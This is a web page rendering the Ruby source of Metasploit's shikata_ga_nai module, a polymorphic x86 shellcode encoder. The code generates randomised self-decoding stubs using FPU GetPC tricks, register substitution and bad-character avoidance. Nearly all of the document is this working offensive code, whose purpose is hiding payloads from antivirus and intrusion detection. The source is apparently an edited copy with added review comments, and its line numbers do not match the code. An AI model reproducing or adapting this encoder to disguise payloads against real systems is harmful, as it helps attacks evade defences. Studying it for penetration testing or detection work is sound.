Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/x86/shikata_ga_nai.rb
19852 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'rex/poly'
7
8
class MetasploitModule < Msf::Encoder::XorAdditiveFeedback
9
10
# The shikata encoder has an excellent ranking because it is polymorphic.
11
# Party time, excellent!
12
Rank = ExcellentRanking
13
14
# Registers the module metadata with the parent encoder class. The decoder
# works on 4-byte blocks with a 4-byte key.
def initialize
  decoder_settings = {
    'KeySize' => 4,
    'BlockSize' => 4
  }

  super(
    'Name' => 'Polymorphic XOR Additive Feedback Encoder',
    'Description' => %q{
        This encoder implements a polymorphic XOR additive feedback encoder.
        The decoder stub is generated based on dynamic instruction
        substitution and dynamic block ordering.  Registers are also
        selected dynamically.
      },
    'Author' => 'spoonm',
    'Arch' => ARCH_X86,
    'License' => MSF_LICENSE,
    'Decoder' => decoder_settings
  )
end
31
32
#
# Returns the shikata decoder stub for +state+, generating and caching it on
# first use. May be called several times for the same state; every call
# after the first returns the cached stub.
#
# Side effects on first call: sets state.decoder_key_offset, prepends the
# tail of the stub to state.buf and stores the stub in state.decoder_stub.
#
# Raises BadGenerateError when a register listed in saved_registers is one
# this encoder always modifies, or when no stub could be generated.
#
def decoder_stub(state)
  # Already generated for this state: hand back the cached copy.
  return state.decoder_stub unless state.decoder_stub.nil?

  # The registers the caller wants preserved must not be ones we clobber.
  raise BadGenerateError unless (modified_registers & saved_registers).empty?

  # Shikata encodes the last 1-4 bytes of its own stub, depending on the
  # alignment of the original buffer (an already aligned buffer yields 4).
  tail_len = 4 - (state.buf.length & 3)
  stub = generate_shikata_block(state, state.buf.length + tail_len, tail_len)
  raise BadGenerateError unless stub

  # Remember where the 'XORK' key placeholder ended up inside the stub.
  state.decoder_key_offset = stub.index('XORK')

  # Move the stub's tail onto the front of the buffer to be encoded, which
  # makes the buffer length a multiple of four.
  stub_tail = stub.slice!(stub.length - tail_len, tail_len)
  state.buf = stub_tail + state.buf

  # Cache the stub so the same bytes are returned on every later call.
  state.decoder_stub = stub
  state.decoder_stub
end
65
66
# Tells callers that this encoder is able to leave a caller-chosen set of
# registers untouched. Always returns true.
def can_preserve_registers?
  true
end
70
71
# Registers this encoder always touches, as Rex::Arch::X86 register ids.
# ESP is not listed here; the original note says it is assumed and handled
# through preserves_stack?.
def modified_registers
  x86 = Rex::Arch::X86

  [
    # The counter register is hardcoded
    x86::ECX,
    # Listed by the original author as modified by div and mul operations
    x86::EAX,
    x86::EDX
  ]
end
81
82
# Registers the block generator must never pick: ESP and ECX, plus every
# register the user asked to have saved (duplicates removed).
def block_generator_register_blacklist
  always_reserved = [Rex::Arch::X86::ESP, Rex::Arch::X86::ECX]
  always_reserved | saved_registers
end
86
87
protected
88
89
#
# Returns the set of FPU instructions that can be used for the FPU block of
# the decoder stub.
#
# Each entry is a two-byte opcode string. The bytes are assembled with
# Array#pack so every entry is a binary (ASCII-8BIT) string no matter which
# source encoding this file is loaded with; concatenating a "\xd9" literal
# with Integer#chr raises Encoding::CompatibilityError under a UTF-8 source
# encoding.
#
def fpu_instructions
  # [first opcode byte, range of second opcode bytes]
  opcode_ranges = [
    [0xd9, 0xe8..0xee],
    [0xd9, 0xc0..0xcf],
    [0xda, 0xc0..0xdf],
    [0xdb, 0xc0..0xdf],
    [0xdd, 0xc0..0xc7]
  ]

  fpus = opcode_ranges.flat_map do |first_byte, second_bytes|
    second_bytes.map { |second_byte| [first_byte, second_byte].pack('CC') }
  end

  # Individual 0xd9-prefixed instructions outside the ranges above.
  [0xd0, 0xe1, 0xf6, 0xf7, 0xe5].each do |second_byte|
    fpus << [0xd9, second_byte].pack('CC')
  end

  # This FPU instruction seems to fail consistently on Linux, so it is
  # deliberately left out:
  # fpus << "\xdb\xe1"

  fpus
end
113
114
#
# Returns a polymorphic decoder stub that is capable of decoding a buffer
# of the supplied length and encodes the last cutoff bytes of itself.
#
# state  - encoder state; +context_encoding+ and +badchars+ are read here.
# length - number of bytes the stub has to decode.
# cutoff - number of trailing stub bytes that are encoded together with the
#          payload; it is subtracted from the displacement of the first
#          decoded dword.
#
# The return value is whatever the final Rex::Poly block's #generate
# returns. Raises EncodingError when generation fails, or when a
# BufferOffset outside -255..255 is combined with "\x00" as a bad character.
#
def generate_shikata_block(state, length, cutoff)
  # Declare logical registers
  Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
  addr_reg = Rex::Poly::LogicalRegister::X86.new('addr')

  # With context encoding the key is loaded through a mov eax, [addr]
  # form, so the key register is pinned to eax.
  key_reg =
    if state.context_encoding
      Rex::Poly::LogicalRegister::X86.new('key', 'eax')
    else
      Rex::Poly::LogicalRegister::X86.new('key')
    end

  # Declare individual blocks
  endb = Rex::Poly::SymbolicBlock::End.new

  # Clear the counter register
  clear_register = Rex::Poly::LogicalBlock.new(
    'clear_register',
    "\x31\xc9", # xor ecx,ecx
    "\x29\xc9", # sub ecx,ecx
    "\x33\xc9", # xor ecx,ecx
    "\x2b\xc9"  # sub ecx,ecx
  )

  # Initialize the counter after zeroing it
  init_counter = Rex::Poly::LogicalBlock.new('init_counter')

  # Round the length up to the next 4-byte block boundary, then convert it
  # to a block count. The parentheses spell out how Ruby already parsed the
  # original expression ('+' binds tighter than '&').
  length += (4 + (4 - (length & 3))) & 3
  length /= 4

  if length <= 0xff
    # mov cl, imm8
    init_counter.add_perm("\xb1" + [ length ].pack('C'))
  elsif length <= 0xffff
    # mov cx, imm16 -- 0xffff is the largest count a 16-bit immediate can
    # hold; 65536 would pack to "\x00\x00" and load a zero counter.
    init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
  else
    # mov ecx, imm32
    init_counter.add_perm("\xb9" + [ length ].pack('V'))
  end

  # Key initialization block. 'XORK' is a placeholder; decoder_stub records
  # its offset in the generated stub.
  init_key =
    if state.context_encoding
      # If using context encoding, we use a mov reg, [addr]
      Rex::Poly::LogicalBlock.new(
        'init_key',
        proc { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK' }
      )
    else
      # Otherwise, we do a direct mov reg, val
      Rex::Poly::LogicalBlock.new(
        'init_key',
        proc { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK' }
      )
    end

  # Opcode + ModRM byte for "xor [addr_reg + disp8], key_reg" and
  # "add key_reg, [addr_reg + disp8]"; callers append the disp8 byte.
  xor = proc { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
  add = proc { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }

  # Two equivalent ways of advancing the address register by one block.
  sub4 = proc { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
  add4 = proc { |b| add_immediate(b.regnum_of(addr_reg), 4) }

  if datastore['BufferRegister']

    buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore['BufferRegister'])
    offset = (datastore['BufferOffset'] ? datastore['BufferOffset'].to_i : 0)
    if ((offset < -255) || (offset > 255)) && state.badchars.include?("\x00")
      raise EncodingError, "Can't generate NULL-free decoder with a BufferOffset bigger than one byte"
    end

    mov = proc do |b|
      # Register-to-register mov that copies buff_reg into addr_reg
      "\x89" + (0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))).chr
    end
    add_offset = proc { |b| add_immediate(b.regnum_of(addr_reg), offset) }
    sub_offset = proc { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }

    getpc = Rex::Poly::LogicalBlock.new('getpc')
    getpc.add_perm(proc { |b| mov.call(b) + add_offset.call(b) })
    getpc.add_perm(proc { |b| mov.call(b) + sub_offset.call(b) })

    # With an offset of less than four, inc is smaller than or the same size as add
    if (offset > 0) && (offset < 4)
      getpc.add_perm(proc { |b| mov.call(b) + inc(b.regnum_of(addr_reg)) * offset })
    elsif (offset < 0) && (offset > -4)
      getpc.add_perm(proc { |b| mov.call(b) + dec(b.regnum_of(addr_reg)) * -offset })
    end

    # NOTE: Adding a perm with possibly different sizes is normally
    # wrong since it will change the SymbolicBlock::End offset during
    # various stages of generation. In this case, though, offset is
    # constant throughout the whole process, so it isn't a problem.
    getpc.add_perm(proc do |b|
      modrm_regs = b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))

      if offset == 0
        # lea addr_reg, [buff_reg]
        "\x8d" + modrm_regs.chr
      elsif offset.between?(-128, 127)
        # lea addr_reg, [buff_reg + byte offset]
        # disp8 is sign-extended, so only -128..127 can use this form.
        "\x8d" + (0x40 + modrm_regs).chr + [offset].pack('c')
      else
        # lea addr_reg, [buff_reg + DWORD offset]
        # NOTE: This may generate NULL bytes!
        "\x8d" + (0x80 + modrm_regs).chr + [offset].pack('V')
      end
      # NOTE(review): these ModRM forms do not emit a SIB byte, so a
      # BufferRegister of ESP (and EBP with a zero offset) would be
      # mis-encoded by this permutation -- confirm against the x86 ModRM
      # rules before relying on it for those registers.
    end)

    # BufferReg+BufferOffset points right at the beginning of our
    # buffer, so in contrast to the fnstenv technique, we don't have to
    # sub off any other offsets.
    xor1 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
    xor2 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
    add1 = proc { |b| add.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
    add2 = proc { |b| add.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }

  else
    # FPU blocks
    fpu = Rex::Poly::LogicalBlock.new('fpu', *fpu_instructions)

    fnstenv = Rex::Poly::LogicalBlock.new('fnstenv', "\xd9\x74\x24\xf4")
    fnstenv.depends_on(fpu)

    # Get EIP off the stack
    getpc = Rex::Poly::LogicalBlock.new(
      'getpc',
      proc { |b| (0x58 + b.regnum_of(addr_reg)).chr }
    )
    getpc.depends_on(fnstenv)

    # Subtract the offset of the fpu instruction since that's where eip points after fnstenv
    xor1 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
    xor2 = proc { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
    add1 = proc { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
    add2 = proc { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
  end

  # Decoder loop block. The *2 variants use a displacement that is 4 smaller
  # because they run after the address register has already been advanced.
  loop_block = Rex::Poly::LogicalBlock.new('loop_block')

  loop_block.add_perm(
    proc { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
    proc { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
    proc { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
    proc { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
    proc { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
    proc { |b| add4.call(b) + xor2.call(b) + add2.call(b) }
  )

  # Loop instruction block
  loop_inst = Rex::Poly::LogicalBlock.new('loop_inst', "\xe2\xf5")
  # In the current implementation the loop block is a constant size,
  # so really no need for a fancy calculation. Nevertheless, here's
  # one way to do it:
  # Proc.new { |b|
  #  # loop <loop_block label>
  #  # -2 to account for the size of this instruction
  #  "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')
  # })

  # Define block dependencies
  clear_register.depends_on(getpc)
  init_counter.depends_on(clear_register)
  loop_block.depends_on(init_counter, init_key)
  loop_inst.depends_on(loop_block)

  begin
    # Generate a permutation saving the ECX, ESP, and user defined registers
    loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
  rescue RuntimeError, EncodingError => e
    # The Rex::Poly block generator can raise RuntimeError variants
    raise EncodingError, e.to_s
  end
end
290
291
# Translates the SaveRegisters datastore option into x86 register ids by
# handing it to Rex::Arch::X86.register_names_to_ids.
def saved_registers
  register_names = datastore['SaveRegisters']
  Rex::Arch::X86.register_names_to_ids(register_names)
end
295
296
# Encodes "sub <reg>, imm" for the 32-bit register numbered +regnum+.
#
# regnum - x86 register number (0-7).
# imm    - Integer immediate; nil or 0 produce no instruction.
#
# Returns a binary string: '' for nil/0, the 3-byte sign-extended imm8 form
# (opcode 0x83) when imm fits in -128..127, otherwise the 6-byte imm32 form
# (opcode 0x81).
def sub_immediate(regnum, imm)
  return '' if imm.nil? || (imm == 0)

  modrm = 0xe8 + regnum

  # The imm8 form is sign-extended by the CPU, so it can only represent
  # -128..127. Anything else needs the imm32 form, otherwise e.g. 200 would
  # be executed as -56.
  if imm.between?(-128, 127)
    [0x83, modrm, imm].pack('CCc')
  else
    [0x81, modrm, imm].pack('CCV')
  end
end
305
306
# Encodes "add <reg>, imm" for the 32-bit register numbered +regnum+.
#
# regnum - x86 register number (0-7).
# imm    - Integer immediate; nil or 0 produce no instruction.
#
# Returns a binary string: '' for nil/0, the 3-byte sign-extended imm8 form
# (opcode 0x83) when imm fits in -128..127, otherwise the 6-byte imm32 form
# (opcode 0x81).
def add_immediate(regnum, imm)
  return '' if imm.nil? || (imm == 0)

  modrm = 0xc0 + regnum

  # The imm8 form is sign-extended by the CPU, so it can only represent
  # -128..127. Anything else needs the imm32 form, otherwise e.g. 200 would
  # be executed as -56.
  if imm.between?(-128, 127)
    [0x83, modrm, imm].pack('CCc')
  else
    [0x81, modrm, imm].pack('CCV')
  end
end
315
316
def inc(regnum)
317
[0x40 + regnum].pack('C')
318
end
319
320
def dec(regnum)
321
[0x48 + regnum].pack('C')
322
end
323
end
324
325